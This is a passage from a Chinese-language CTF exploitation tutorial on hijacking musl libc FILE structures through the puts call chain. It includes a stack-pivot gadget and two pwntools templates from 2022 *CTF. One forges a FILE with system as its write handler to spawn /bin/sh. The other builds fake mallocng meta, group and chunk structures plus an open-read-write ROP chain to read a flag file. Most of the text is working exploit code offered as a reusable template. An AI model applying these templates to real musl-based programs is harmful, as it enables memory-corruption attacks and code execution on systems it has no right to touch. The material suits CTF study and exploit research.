对于 musl-1.2.1 及以下的版本，可以使用如下。或者直接将 chunk 申请到栈上写 rop。例如这道题目 。
mov rdx, [rdi+0x30]; mov rsp, rdx; mov rdx, [rdi+0x38]; jmp rdx;
puts 调用链
分析 puts 函数的调用链，发现最终会调用
int puts(const char *s) {int r;FLOCK(stdout);r = -(fputs(s, stdout) < 0 || putc_unlocked('\n', stdout) < 0);FUNLOCK(stdout);return r;}int fputs(const char *restrict s, FILE *restrict f) {size_t l = strlen(s);return (fwrite(s, 1, l, f) == l) - 1;}size_t fwrite(const void *restrict src, size_t size, size_t nmemb, FILE *restrict f) {size_t k, l = size * nmemb;if (!size) nmemb = 0;FLOCK(f);k = __fwritex(src, l, f);FUNLOCK(f);return k == l ? nmemb : k / size;}int __towrite(FILE *f) {...if (f->flags & F_NOWR) {f->flags |= F_ERR;return EOF;}...return 0;}size_t __fwritex(const unsigned char *restrict s, size_t l, FILE *restrict f) {size_t i = 0;if (!f->wend && __towrite(f)) return 0;if (l > f->wend - f->wpos) return f->write(f, s, l);...}
常用模板如下（2022*CTF ）：
get shell
fake_file = ""fake_file += "/bin/sh".ljust(8, '\x00')# flagsfake_file += p64(0)# rposfake_file += p64(0)# rendfake_file += p64(0)# closefake_file += p64(0x114514)# wendfake_file += p64(0x114514)# wposfake_file += p64(0)# mustbezero_1fake_file += p64(0x114514)# wbasefake_file += p64(0)# readfake_file += p64(libc.sym['system'])# writefake_file = fake_file.ljust(0x80, '\x00')
orw（musl-1.2.2）
【debug musl】fake_name_addr = libc.address + 0xb7990payload_addr = libc.address - 0x6fe0fake_file_addr = payload_addrfake_group_addr = fake_file_addr + 0x90fake_chunk_addr = fake_group_addr + 0x10fake_meta_area_offset = ((payload_addr + 0xFFF) & ~0xFFF) - payload_addrfake_meta_offset = fake_meta_area_offset + 8fake_meta_addr = payload_addr + fake_meta_offsetstderr_used_addr = libc.address + 0xb43a0rop_addr = fake_chunk_addrmagic_gadget = libc.search(asm('mov rsp, qword ptr [rdi + 0x30] ; jmp qword ptr [rdi + 0x38]'), executable=True).next()pop_rdi_ret = libc.search(asm("pop rdi;ret"), executable=True).next()pop_rsi_ret = libc.search(asm("pop rsi;ret"), executable=True).next()pop_rdx_ret = libc.search(asm("pop rdx;ret"), executable=True).next()pop_rax_ret = libc.search(asm("pop rax;ret"), executable=True).next()ret = libc.search(asm("ret"), executable=True).next()buf_addr = payload_addrrop = ''rop += p64(pop_rdi_ret)rop += p64(buf_addr)rop += p64(pop_rsi_ret)rop += p64(0)rop += p64(libc.sym['open'])rop += p64(pop_rdi_ret)rop += p64(3)rop += p64(pop_rsi_ret)rop += p64(buf_addr)rop += p64(pop_rdx_ret)rop += p64(0x100)rop += p64(libc.sym['read'])rop += p64(pop_rdi_ret)rop += p64(1)rop += p64(pop_rsi_ret)rop += p64(buf_addr)rop += p64(pop_rdx_ret)rop += p64(0x100)rop += p64(libc.sym['write'])fake_file = ""fake_file += "./flag".ljust(8, '\x00')# flagsfake_file += p64(0)# rposfake_file += p64(0)# rendfake_file += p64(0)# closefake_file += p64(0)# wendfake_file += p64(0)# wposfake_file += p64(rop_addr)# mustbezero_1fake_file += p64(ret)# wbasefake_file += p64(0)# readfake_file += p64(magic_gadget)# writefake_file = fake_file.ljust(0x90, '\x00')# lock = 0fake_group = p64(fake_meta_addr) + p64(0)fake_meta = ''fake_meta += p64(fake_file_addr)# prevfake_meta += p64(stderr_used_addr)# nextfake_meta += p64(fake_group_addr)# memfake_meta += p32(0b0000)# avail_maskfake_meta += p32(0b1110)# freed_masklast_idx = 3freeable = 1sizeclass = 8maplen = 0fake_meta += p64(last_idx | (freeable << 5) | (sizeclass << 6) | (sizeclass << 12))fake_meta_area = p64(leak_secret) + fake_metapayload = ''payload += fake_filepayload += fake_grouppayload += ropassert len(payload) <= fake_meta_area_offsetpayload = payload.ljust(fake_meta_area_offset, '\x00')payload += fake_meta_areapayload = payload.ljust(0x2000, '\x00')fake_node = ''fake_node += p64(fake_name_addr)# name_addrfake_node += p64(fake_chunk_addr)# content_addrfake_node += p64(len('fake name'))# name_sizefake_node += p64(0)# content_sizefake_node += p64(0)# nextadd('hijack node'.ljust(0x28, '\x00'), fake_node)add("payload", payload)log.info("fake chunk addr: " + hex(fake_chunk_addr))